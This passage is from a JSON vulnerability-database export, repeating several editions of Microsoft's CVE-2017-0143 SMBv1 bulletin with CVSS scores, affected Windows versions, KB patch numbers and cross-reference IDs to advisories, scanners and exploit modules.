"3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-12T20:49:50", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012606", "KB4013429", "KB4012212", "KB4012598", "KB4012213", "KB4012215", "KB3210721", "KB3205401", "KB4012216", "KB3212646", "KB3210720", "KB3213986", "KB4013198", "KBMS16-110, 3187754", "KB4012214", "KB3177186", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T20:49:50", "differentElements": ["msAffectedSoftware"], "edition": 39}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-12T22:47:20", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB3210720", "KB3205401", "KB4013198", "KB4012216", "KB3205409", "KB3212646", "KB3213986", "KB4012213", "KBMS16-110, 3187754", "KB4012212", "KB4012598", "KB4012606", "KB4012217", "KB4013429", "KB4012214", "KB3177186", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T22:47:20", "differentElements": ["msAffectedSoftware"], "edition": 40}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-13T00:46:29", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
